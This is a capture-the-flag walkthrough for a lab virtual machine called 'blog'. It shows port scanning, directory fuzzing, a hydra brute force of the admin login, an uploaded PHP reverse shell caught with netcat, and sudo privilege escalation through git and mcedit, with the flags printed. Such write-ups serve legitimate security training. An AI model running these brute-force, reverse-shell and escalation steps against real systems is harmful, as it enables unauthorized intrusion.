This machine was created by d4t4s3c

Port recognition withnmapor you can use recon

┌──(root@ghost)-[/home/ghost]
└─# recon blog.hmvm

    .o oOOOOOOOo                                            OOOo
    Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
    OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
    OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
    `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
    OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
    .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
                 '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
                      `$"  `OOOO' `O"Y ' `OOOO'  o             .
    .                  .     OP"          : o     .
                              :
                              .

[R3C0N] by 0bfxgh0st 4 WWA with ❤

[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-19 19:24 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
Initiating ARP Ping Scan at 19:24
Scanning blog.hmvm (10.0.2.22) [1 port]
Completed ARP Ping Scan at 19:24, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:24
Scanning blog.hmvm (10.0.2.22) [65535 ports]
Discovered open port 22/tcp on 10.0.2.22
Discovered open port 80/tcp on 10.0.2.22
Completed SYN Stealth Scan at 19:24, 1.49s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.22.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
Nmap scan report for blog.hmvm (10.0.2.22)
Host is up (0.000058s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:B4:A6:4E (Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.74 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)


[i] [Server info]
http://blog.hmvm:80 [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[10.0.2.22]

[+] [fuzzin server]

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Sep 19 19:24:57 2022
URL_BASE: http://blog.hmvm:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://blog.hmvm:80/ ----
+ http://blog.hmvm:80/index.php (CODE:200|SIZE:271)                                                                                                                                                
+ http://blog.hmvm:80/server-status (CODE:403|SIZE:274)                                                                                                                                            
                                                                                                                                                                                                   
-----------------
END_TIME: Mon Sep 19 19:24:59 2022
DOWNLOADED: 4612 - FOUND: 2

recon reports two open ports and a few information more

┌──(root@ghost)-[/home/ghost]
└─# wfuzz --hc=404 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://blog.hmvm/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://blog.hmvm/FUZZ
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                            
=====================================================================

000000003:   200        6 L      37 W       271 Ch      "# Copyright 2007 James Fisher"                                                                                                    
000000001:   200        6 L      37 W       271 Ch      "# directory-list-2.3-medium.txt"                                                                                                  
000000007:   200        6 L      37 W       271 Ch      "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"                                                                  
000000014:   200        6 L      37 W       271 Ch      "http://blog.hmvm/"                                                                                                                
000000011:   200        6 L      37 W       271 Ch      "# Priority ordered case sensative list, where entries were found"                                                                 
000000006:   200        6 L      37 W       271 Ch      "# Attribution-Share Alike 3.0 License. To view a copy of this"                                                                    
000000008:   200        6 L      37 W       271 Ch      "# or send a letter to Creative Commons, 171 Second Street,"                                                                       
000000005:   200        6 L      37 W       271 Ch      "# This work is licensed under the Creative Commons"                                                                               
000000002:   200        6 L      37 W       271 Ch      "#"                                                                                                                                
000000010:   200        6 L      37 W       271 Ch      "#"                                                                                                                                
000000013:   200        6 L      37 W       271 Ch      "#"                                                                                                                                
000000009:   200        6 L      37 W       271 Ch      "# Suite 300, San Francisco, California, 94105, USA."                                                                              
000000012:   200        6 L      37 W       271 Ch      "# on atleast 2 different hosts"                                                                                                   
000000004:   200        6 L      37 W       271 Ch      "#"                                                                                                                                
000007428:   301        9 L      28 W       310 Ch      "my_weblog"                                                                                                                        
000045240:   200        6 L      37 W       271 Ch      "http://blog.hmvm/"
000095524:   403        9 L      28 W       274 Ch      "server-status"

Total time: 0
Processed Requests: 220560
Filtered Requests: 220543
Requests/sec.: 0

Interesting dir my_weblog, more fuzzing

┌──(root@ghost)-[/home/ghost]
└─# wfuzz --hc=404 -w /usr/share/wfuzz/wordlist/general/big.txt http://blog.hmvm/my_weblog/FUZZ.php
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://blog.hmvm/my_weblog/FUZZ.php
Total requests: 3024

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                            
=====================================================================

000000119:   200        26 L     96 W       1395 Ch     "admin"                                                                                                                            
000001350:   200        64 L     201 W      4297 Ch     "index"                                                                                                                            

Total time: 0
Processed Requests: 3024
Filtered Requests: 3022
Requests/sec.: 0

At this point seems only one way login bruteforce

┌──(root@ghost)-[/home/ghost]
└─# hydra -t 50 -l admin -P rockyou.txt blog.hmvm http-post-form '/my_weblog/admin.php:username=admin&password=^PASS^:Incorrect'
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-19 20:02:14
[DATA] max 50 tasks per 1 server, overall 50 tasks, 14344399 login tries (l:1/p:14344399), ~286888 tries per task
[DATA] attacking http-post-form://blog.hmvm:80/my_weblog/admin.php:username=admin&password=^PASS^:Incorrect
[STATUS] 137.00 tries/min, 137 tries in 00:01h, 14344262 to do in 1745:03h, 50 active
[80][http-post-form] host: blog.hmvm   login: admin   password: kisses
[STATUS] 4781466.33 tries/min, 14344399 tries in 00:03h, 1 to do in 00:01h, 3 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-19 20:05:37

We have admin credentials time to login. Searching for a tab to upload we found it under Plugins, Manage plugins, My image and click on configure. Create a shell and upload

┌──(root@ghost)-[/home/ghost]
└─# shellstorm.sh php-daemon 10.0.2.15 1337 > rev.php

Time to start netcat listener and execute shell by visiting http://blog.hmvm/my_weblog/content/private/plugins/my_image/image.php

┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.0.2.15] from blog.hmvm [10.0.2.22] 52274
Linux blog 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
 02:15:54 up 56 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty; pty.spawn('/bin/bash')"
www-data@blog:/$ sudo -l

Matching Defaults entries for www-data on blog:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on blog:
    (admin) NOPASSWD: /usr/bin/git

www-data@blog:/$ sudo -u admin git help config

admin@blog:~$ cat /home/admin/user.txt
a8nuLuByPMCpuf4k3f146j9NtOsmi2dKZGN3m

Here user flag, time to get root

admin@blog:~$ sudo -l

Matching Defaults entries for admin on blog:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User admin may run the following commands on blog:
    (root) NOPASSWD: /usr/bin/mcedit

This part is a little bit tricky

admin@blog:~$ sudo -u root /usr/bin/mcedit

Once open Press F9 and Enter, Go to User Menu and select s invoke shell

# cat /root/r0000000000000000000000000t.txt
fO6QQxO1oenROPf4k3f146vweJRVgbtPQ3RQ4